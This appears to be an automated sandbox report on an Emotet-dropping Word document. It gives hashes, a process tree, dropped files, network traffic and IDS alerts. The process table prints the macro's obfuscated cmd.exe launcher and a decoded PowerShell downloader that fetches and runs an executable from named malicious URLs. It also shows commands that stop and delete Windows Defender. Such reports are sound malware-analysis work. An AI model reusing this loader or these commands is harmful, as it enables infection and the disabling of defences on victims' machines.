File name: | myO2Business_15_11_18.doc |
Full analysis: | https://app.any.run/tasks/27a2d5c8-7ac9-4eb8-bc60-dc4ac833435a |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 15, 2018, 10:32:09 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Nov 15 09:31:00 2018, Last Saved Time/Date: Thu Nov 15 09:31:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | 0EC139B1B283F1E345EF5933FA564392 |
SHA1: | 5CCA4DE8D73BABA65C0CB7EE7282C0A4937233AD |
SHA256: | A0A076CCABE88621750644FF177DB5899947C7069E99C46EED5C0DCA8337A228 |
SSDEEP: | 1536:D2HSXjssocn1kp59gxBK85fBu+auyqpP63rv:D84241k/W48Ir |
.doc | | | Microsoft Word document (80) |
---|
CompObjUserType: | uNdPUpWAPrEXTOIKzjFIzbubDPDvjVW |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:15 09:31:00 |
CreateDate: | 2018:11:15 09:31:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2972 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\myO2Business_15_11_18.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
476 | c:\mEKzkRGYnjFPXQ\YnhJKqCDDsWmJD\CmmSTHHqddkcu\..\..\..\windows\system32\cmd.exe /C"s^e^t U^1=^.&&^s^et v^E^I=^L&&^s^et ^Ft^0X=^ &&s^e^t ^9l=)^;&&^s^e^t ^Ql^P=^B&&^s^et 4^Z^w=^Ob^j&&s^e^t P^7^l=^$z&&s^e^t 0^5a^b=.^s^av&&^s^et ^gh^1C=e&&^s^e^t ^wg0^K=h^@&&s^e^t ^2Cz=^m&&^s^e^t o^Q^FR=^ &&^se^t ^eN^s=^e&&s^e^t N^O=/&&^s^et ^Eu^M^X=^m^l^h&&^s^et ^6^J8b=n&&s^e^t ^2^aq=^tp^:/&&s^e^t ^a^d=gre&&^se^t ^56=^to&&^s^e^t ^jP^3=^ ^=N&&^s^e^t ^7sC=^ob^am^t&&s^e^t ^76^I^d=r^e&&^s^et ^K^f^F^T=n^d(&&s^e^t ^3a=^i&&^se^t ^1D^5r=n&&^s^e^t ^k^I=^m^l^2.&&s^e^t c^YvQ=^w.&&^s^e^t ^oZ^H^A=^l&&^s^et ^T^a=$^p&&^s^e^t ^Sgc^J=a^d&&^se^t ^u^M^D=e(f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t p^l=o^o&&s^e^t ^o^YCn=^{^}^}&&^s^e^t ^A^U5^g= =^ &&^s^e^t ^3^1=^4&&^s^e^t w^O=^-&&^s^et ^el^z=^ &&^s^et O^h^LG=r&&set gy^X^l=^ &&s^et ^0^Wa=B^o^dy&&^se^t ^1sE^L=^dv^.o^p&&s^e^t ^l^Z^P=c^t&&^s^et a^pv^D=^h^TC)^;^S&&^s^et 9^P^7=j^e&&^s^et ^L5^e=^b&&^se^t ^S^g=()^+&&s^e^t J^s^z=^e^l^l^ &&^s^et T^e=/^pr^o&&^s^e^t N^j=^.&&^s^et AW7q=^tt&&^s^et o^D^u=^e&&se^t ^E^L=^o&&s^e^t ^aB=^.e^x&&^s^et ^5L^Ma=^o^UU&&^s^e^t ^w^LC=^.&&s^e^t ^5^L^3=^y&&^s^e^t ^5^Z^o=^x&&^se^t ^37^S=c&&^s^e^t S^L^a^Q=r&&s^e^t ^qTV^i=^d&&^s^et 7^D=^i&&^s^et NL^l=c&&^s^e^t vG^m^2=^'^;&&^s^e^t P^H=^a&&^s^et ^qw^g=^p&&^s^et ^QN=(^'^@&&s^e^t ^83^w=^e&&s^e^t ^6D^z=C&&s^e^t o^7^K^T=^E&&s^e^t ^Pw^f^1=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^tu=^W&&^s^e^t ^3F=^e&&s^e^t ^U^H=^se&&s^et ^1^Amb=^ &&^s^e^t ^aR^Wr=^t&&^s^e^t W^B=^p^X&&^s^e^t v^d=^ath^]^:^:&&^s^et C0^P=^ht^t&&^s^et a^43^k=^;^br&&^s^et ^5^e^B=c&&^s^et Q^I^aC=^ons&&^s^e^t ^GnH^p=/r&&^se^t EG=v&&^s^et ^qy=^h&&^se^t V^H^p=T&&s^e^t ^Pm^B=^o&&^s^e^t ^u^h^a=^0&&^s^e^t ^FTY^3=^;&&^s^et avVW=^e&&^se^t ^Ut^lj=(&&s^e^t o^j=^p&&^se^t C^Q=^p&&^s^et Q^q2^g=^p^:&&se^t 7^u^2=^W&&^s^et ^Wj^h=^l&&^se^t vV=^.&&^s^et 0^A^E^1=c&&^s^et ^qrn4=^,&&^s^et ^a^2H=^I&&s^e^t n^p^4= ^ ^ &&s^e^t ^Lx^mn=^= N&&s^e^t ^Um^l=^.&&^s^et ^O^TXB= ^ &&^s^e^t ^ag^Br=C^U^Q&&^se^t ^pUI=t^o&&^s^et C^B^M^j=^{^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et n^8C^w=C&&^s^et ^k^dr=^ &&^s^e^t ^W^U3=c&&s^e^t F^i=ec&&s^e^t ^S^u^Z^8=r^e^a&&^se^t c^Q^l^K=^o^m/&&s^e^t 2li=//&&^se^t TY^X^9=^@&&^s^et ^w0^y=r^u/^At^fu&&^s^et ^3C=^j=&&^s^e^t ^l^j=^.&&^set C^Hj^L=^p&&^s^et ^A^f^6w=n&&s^e^t ^Q^6^M=r^e^d&&^se^t ^K6^J=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^6N^Av=c&&s^e^t ^t^Ggr=^en&&s^e^t ^a3=c&&^s^e^t J^Y^qD=^e&&^s^et a^t^W=^f^b&&^s^et E^e=m^s^x&&^s^e^t g^0^A=^en(^'&&s^et ^3^g^Yo=^'^\&&^s^et ^a^Yc=$^h&&^s^et W^b^i4=n^e^w^sr^ev&&^se^t ny^fc=^i&&^s^et ^S^F^H=^e&&s^e^t ^0^jz=^l&&^s^et ^3R=v^h&&^s^et ^2^3^o^G=^P&&s^e^t N^8^b=l^k&&^s^et W^6^ta=^f&&^s^et 6^4=//&&s^e^t V^8^x^U=^E&&^se^t ^pe=)^;&&^s^e^t ^2^Xj=^@h^t&&^s^e^t ^4O^f=^tar&&^se^t v^X^b4=^')&&^s^et ^8q^L=^w^.^a&&^se^t ^J^z=^Proc^e&&^se^t t^37=n^d&&^se^t ^qx^Y=^k&&^s^et ^L^Sl=^j){^tr&&s^e^t ^Sf=^a&&s^e^t ^9E^I=c^h&&^s^e^t C5^S^P=n^o^-^ate^li^e&&^s^e^t lr^k^4=^t^t^p^:&&^se^t ^k^wL^H=^s^h&&^se^t 6N^W^f=^wr^it^e(&&set aN^8=^TC=(^[^S&&s^e^t ^2^L=();f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^s^et ^k^S^yn=^u/&&^s^et 4^G=^e^am&&^se^t ^2^x=^e&&^s^e^t 8^d^5=t^ &&^se^t e^7^T=^l&&^s^e^t A^Y=^ &&^se^t Krz=o^m&&^s^et ^KS=v&&^s^et E^m^J=^i&&^s^e^t 5^o=Cr&&^s^et 9^P^3v=^ &&^s^et 4^3=r&&^se^t ^0L^i=r^l&&se^t ^q^O^EI=^t&&^s^et ^L^m=^1^;^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^O^d^zI=^e&&s^e^t ^uI^U=^l&&^se^t ^P^B^ak=^t&&^se^t ^W^E^4=$^z&&s^e^t ^2^u=^.&&^s^et ^a8=^h&&^s^et 6Q^h^A=^e&&^s^et c^0=^o^m/&&^s^et ^US^q=)^;&&^s^et ^F^O=^p&&^se^t ^aM^E^Z='^;$p^d&&^s^e^t V^tJ^Q=^e'&&^s^et GxA^f=^w&&s^e^t ^2N^d=^i&&^se^t ^G^0J=r&&^se^t 7^8=^ar&&s^e^t ^jT^q=^t^y^p&&^s^e^t k^9^z=^Ge^t^T&&s^et V^TK^8=^'&&s^e^t V2^0^6=^a&&set o^F^y=f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t ^o^T^Mr=^ &&^se^t ^W^J^O=^o^p&&s^e^t ^Q^4L=.^s&&^se^t ^AS^EF=^h&&^se^t ^o^8c^O=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&^se^t ^U^gi=^zn^W&&s^e^t ^P^k=^$^zn^W^.&&s^e^t a^PS=^p^:&&s^e^t e^B^T^M=^:/&&^s^e^t nN^t=^e&&^s^e^t L^w^8^K=^b&&^se^t l^w=^p&&^se^t ^k^xl=^$^pd&&^s^et v^j=^ &&^s^et ^ORQ^p=r&&^s^e^t g^A^E=n&&^s^et ^e^j^d=^t&&^s^e^t ^oc^U=e^w-&&^s^e^t O^5=^a&&^s^et V^lRb=^;&&^s^et NC=^l&&^s^e^t ^s^l=^p^o^we&&s^e^t k^SC^7=^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t v^q=^h&&^s^e^t V^m=ttp&&^s^e^t ^a^W2^t=^X^j='&&^se^t S^y=^.&&s^e^t ^1^7N=c^h&&^se^t 2^Y^x=/ww&&^se^t ^8x=^h&&^se^t ^L^xw=^ ^ &&s^e^t 5^6^Px=^i&&^se^t C^s=^dv^.&&^se^t u^J^5X=^t^-&&s^e^t ^qRw=^s&&^s^e^t p^i^og=m^ ^'&&s^e^t ^8^5TR=O&&^s^et ^Sg^BK=^s^p&&^s^e^t ^w9C^q=^t&&s^e^t ^a^uHr=^e&&s^e^t Nf^9^4=^t&&^set ^W8^mz=^G&&^se^t n^gd^f=^-&&^se^t ^A^T5^L=^ ^f7f81a39-5f63-5b42-9efd-1f13b5431005amp;&s^e^t N^U=^s^s &&^s^et gG^8^E=)&&^s^e^t QvS=^e&&^s^e^t ^Sr=^a^k}&&^s^e^t u^F=^a&&^s^et nc^d^8=^fi&&^s^e^t cV=^UF^'.S&&^s^e^t ^Gd=^O&&^se^t eIL=-co^m^ 'a^d^od^b&&^s^e^t ^aURV=N&&s^e^t ^LN=m^p^P&&^s^et W^L^D4=^e&&^se^t ^ek^X=v&&s^e^t ^Fy^9c=^'^Sij&&s^e^t ^7^9^w=k^9&&^s^et ^us=W^i&&^s^et ^0F=N^@h^t&&s^e^t C^Uz^5=^;&&^se^t ^K^X^wL=N&&^se^t ^4B=/^K&&^s^et N^HC^S=^0&&^s^e^t 0^I^DQ=^ &&set ^w^B2=^T&&^s^e^t ^PDq^B=^s^.&&^s^e^t ^5v^E=ys^t^e&&^se^t ^4r=^'^,&&s^e^t ^Fg^e=^j&&c^al^l ^s^e^t jKY=%^s^l%%^ORQ^p%%^k^wL^H%%J^s^z%%^Pw^f^1%%^3R%%^3C%%^Fy^9c%%V^TK^8%%^FTY^3%%^T^a%%^a^W2^t%%C0^P%%a^PS%%6^4%%^a^d%%^83^w%%^A^f^6w%%^L5^e%%J^Y^qD%%e^7^T%%Nf^9^4%%W^b^i4%%5^6^Px%%^3F%%c^YvQ%%^5^e^B%%Krz%%^4B%%^7^9^w%%^u^h^a%%^Fg^e%%^5L^Ma%%TY^X^9%%v^q%%V^m%%e^B^T^M%%^GnH^p%%^Sgc^J%%^3a%%^7sC%%V2^0^6%%u^F%%^76^I^d%%^l^j%%^6N^Av%%c^0%%^K^X^wL%%0^A^E^1%%^S^F^H%%v^E^I%%^3^1%%^us%%^2^Xj%%^aR^Wr%%Q^q2^g%%N^O%%T^e%%7^8%%^a3%%^a8%%7^D%%^uI^U%%^Sf%%t^37%%S^y%%S^L^a^Q%%^k^S^yn%%^Ql^P%%^aURV%%^0F%%^2^aq%%2^Y^x%%^8q^L%%NC%%^2^x%%a^t^W%%p^l%%^qx^Y%%^qRw%%^56%%4^3%%o^D^u%%^PDq^B%%NL^l%%c^Q^l^K%%o^7^K^T%%^wg0^K%%^AS^EF%%lr^k^4%%2li%%o^j%%^gh^1C%%^Q^6^M%%avVW%%N^8^b%%ny^fc%%C5^S^P%%N^j%%^w0^y%%cV%%C^Q%%^0^jz%%E^m^J%%^P^B^ak%%^QN%%v^X^b4%%V^lRb%%^a^Yc%%aN^8%%^5v^E%%^2Cz%%^2^u%%^a^2H%%^Gd%%^Um^l%%^2^3^o^G%%v^d%%k^9^z%%^eN^s%%^LN%%P^H%%^e^j^d%%^8x%%^S^g%%^3^g^Yo%%^ag^Br%%^aB%%V^tJ^Q%%gG^8^E%%C^Uz^5%%^W^E^4%%g^A^E%%7^u^2%%^jP^3%%6Q^h^A%%GxA^f%%w^O%%4^Z^w%%F^i%%8^d^5%%n^gd^f%%^W^U3%%^Pm^B%%p^i^og%%E^e%%^k^I%%^5^Z^o%%^Eu^M^X%%AW7q%%^qw^g%%^aM^E^Z%%EG%%^1^Amb%%^Lx^mn%%^oc^U%%^8^5TR%%L^w^8^K%%9^P^7%%^l^Z^P%%A^Y%%eIL%%^Q^4L%%^q^O^EI%%O^h^LG%%4^G%%vG^m^2%%W^6^ta%%^E^L%%^S^u^Z^8%%^1^7N%%^Ut^lj%%^K6^J%%5^o%%^oZ^H^A%%9^P^3v%%^2N^d%%^6^J8b%%^A^T5^L%%W^B%%^L^Sl%%^5^L^3%%C^B^M^j%%^U^gi%%U^1%%^W^J^O%%g^0^A%%^W8^mz%%V^8^x^U%%^w^B2%%^4r%%k^SC^7%%^6D^z%%^0L^i%%^qrn4%%N^HC^S%%^pe%%P^7^l%%^1D^5r%%^tu%%vV%%^U^H%%^K^f^F^T%%^9l%%o^F^y%%^F^O%%^1sE^L%%^t^Ggr%%^2^L%%C^Hj^L%%^qTV^i%%^ek^X%%^w^LC%%^jT^q%%nN^t%%^A^U5^g%%^L^m%%l^w%%C^s%%6N^W^f%%^P^k%%^G^0J%%^O^d^zI%%^Sg^BK%%Q^I^aC%%QvS%%^0^Wa%%^US^q%%^k^xl%%^KS%%0^5a^b%%^a^uHr%%^pUI%%nc^d^8%%^Wj^h%%^u^M^D%%a^pv^D%%^4O^f%%u^J^5X%%^J^z%%N^U%%^o^8c^O%%^qy%%V^H^p%%n^8C^w%%a^43^k%%W^L^D4%%^Sr%%^37^S%%O^5%%^w9C^q%%^9E^I%%^o^YCn%%^k^dr%%v^j%%^o^T^Mr%%^O^TXB%%n^p^4%%gy^X^l%%o^Q^FR%%^L^xw%%^el^z%%^Ft^0X%%0^I^DQ%&&c^a^ll %^j^KY%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3880 | powershell $vhj='Sij';$pXj='http://greenbeltnewsreview.com/Kk90joUU@http://radiobamtaare.com/NceL4Wi@http://proarchiland.ru/BNN@http://www.alefbookstores.com/Eh@http://peredelkino-atelie.ru/AtfuUF'.Split('@');$hTC=([System.IO.Path]::GetTempPath()+'\CUQ.exe');$znW =New-Object -com 'msxml2.xmlhttp';$pdv = New-Object -com 'adodb.stream';foreach($Crl in $pXj){try{$znW.open('GET',$Crl,0);$znW.send();$pdv.open();$pdv.type = 1;$pdv.write($znW.responseBody);$pdv.savetofile($hTC);Start-Process $hTC;break}catch{}} | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2004 | "C:\Users\admin\AppData\Local\Temp\CUQ.exe" | C:\Users\admin\AppData\Local\Temp\CUQ.exe | — | powershell.exe |
User: admin Company: LoftSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: ME15165 OPPD Exit code: 0 Version: 1, 5, 2, 50 | ||||
3652 | "C:\Users\admin\AppData\Local\Temp\CUQ.exe" | C:\Users\admin\AppData\Local\Temp\CUQ.exe | CUQ.exe | |
User: admin Company: LoftSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: ME15165 OPPD Exit code: 0 Version: 1, 5, 2, 50 | ||||
2224 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | CUQ.exe | |
User: admin Company: LoftSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: ME15165 OPPD Exit code: 0 Version: 1, 5, 2, 50 | ||||
2228 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: LoftSoft / Sun Microsystems, Inc. Integrity Level: MEDIUM Description: ME15165 OPPD Version: 1, 5, 2, 50 | ||||
3548 | "C:\ProgramData\1JFfx.exe" | C:\ProgramData\1JFfx.exe | lpiograd.exe | |
User: admin Integrity Level: MEDIUM Exit code: 0 | ||||
1020 | /c sc stop WinDefend | C:\Windows\system32\cmd.exe | — | 1JFfx.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 5 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2144 | /c sc delete WinDefend | C:\Windows\system32\cmd.exe | — | 1JFfx.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 5 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2972 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA3BD.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\H1E1GQCZNIQR4W37OQ5F.temp | — | |
MD5:— | SHA256:— | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q0ZV25DRFM0PKQAD4E3V.temp | — | |
MD5:— | SHA256:— | |||
3532 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QHQENR2DUM6L70QBLDNF.temp | — | |
MD5:— | SHA256:— | |||
2228 | lpiograd.exe | C:\ProgramData\1JFfx.exe | executable | |
MD5:0A632CF368FDF4BB25B2C60B1192DCC9 | SHA256:CB9D1688480A1A97823D013366E4BF8B484275A35DD553260A9DD7E00F1A5643 | |||
3652 | CUQ.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:075A91B9023D6E8710BE516C1FC5348A | SHA256:7E99AE088FA7C09A5CA32782A99FA54F137B9055E69F81B6C1BFC3F0A6498759 | |||
2076 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:246C45549567011BBF8CF7A8B3FECFCC | SHA256:2FF7AAFCE1861030885991A21F46EC7C1799207CE6C7AC9EB18621051B240DD5 | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5db050.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3880 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
3548 | 1JFfx.exe | C:\Users\admin\AppData\Roaming\vsvsid\1KGfx.exe | executable | |
MD5:0A632CF368FDF4BB25B2C60B1192DCC9 | SHA256:CB9D1688480A1A97823D013366E4BF8B484275A35DD553260A9DD7E00F1A5643 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2228 | lpiograd.exe | GET | — | 190.146.205.227:80 | http://190.146.205.227/whoami.php | CO | — | — | malicious |
2228 | lpiograd.exe | GET | — | 68.102.169.43:8080 | http://68.102.169.43:8080/ | US | — | — | malicious |
2228 | lpiograd.exe | GET | — | 190.146.205.227:80 | http://190.146.205.227/ | CO | — | — | malicious |
2228 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
2228 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/ | US | binary | 60.8 Kb | malicious |
2228 | lpiograd.exe | GET | 200 | 71.71.126.201:8080 | http://71.71.126.201:8080/ | US | binary | 1.14 Mb | malicious |
3880 | powershell.exe | GET | 301 | 192.185.102.133:80 | http://greenbeltnewsreview.com/Kk90joUU | US | html | 321 b | malicious |
2228 | lpiograd.exe | GET | 200 | 24.176.53.106:80 | http://24.176.53.106/whoami.php | US | text | 13 b | malicious |
3880 | powershell.exe | GET | 200 | 192.185.102.133:80 | http://greenbeltnewsreview.com/Kk90joUU/ | US | executable | 148 Kb | malicious |
2228 | lpiograd.exe | GET | 200 | 76.73.213.148:8090 | http://76.73.213.148:8090/ | US | binary | 148 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2228 | lpiograd.exe | 188.125.73.26:25 | smtp.mail.yahoo.com | — | CH | unknown |
3880 | powershell.exe | 192.185.102.133:80 | greenbeltnewsreview.com | CyrusOne LLC | US | suspicious |
2228 | lpiograd.exe | 64.37.61.157:25 | vtdesignz.com | HostDime.com, Inc. | US | unknown |
2228 | lpiograd.exe | 68.102.169.43:8080 | — | Cox Communications Inc. | US | malicious |
2228 | lpiograd.exe | 188.125.73.26:465 | smtp.mail.yahoo.com | — | CH | unknown |
2228 | lpiograd.exe | 103.103.197.37:25 | pop.zoho.in | — | — | unknown |
2228 | lpiograd.exe | 103.117.180.128:465 | — | — | — | unknown |
2228 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
2228 | lpiograd.exe | 24.176.53.106:80 | — | Charter Communications | US | malicious |
2228 | lpiograd.exe | 190.146.205.227:80 | — | Telmex Colombia S.A. | CO | malicious |
Domain | IP | Reputation |
---|---|---|
greenbeltnewsreview.com |
| malicious |
outlook.office365.com |
| whitelisted |
vtdesignz.com |
| unknown |
smtp.mail.yahoo.com |
| shared |
mail.fullerpinto.com |
| unknown |
mail.huaqin.com |
| shared |
pop.zoho.in |
| unknown |
secure.emailsrvr.com |
| shared |
pop.internetpro.net |
| unknown |
mail.gissa-cr.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
3880 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3880 | powershell.exe | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from MSXMLHTTP non-exe extension M2 |
3880 | powershell.exe | A Network Trojan was detected | ET TROJAN VBScript Redirect Style Exe File Download |
3880 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2228 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Trojan-Banker.Win32.Emotet |
2228 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2228 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Trojan-Banker.Win32.Emotet |
2228 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2228 | lpiograd.exe | A Network Trojan was detected | SC SPYWARE Trojan-Banker.Win32.Emotet |
2228 | lpiograd.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |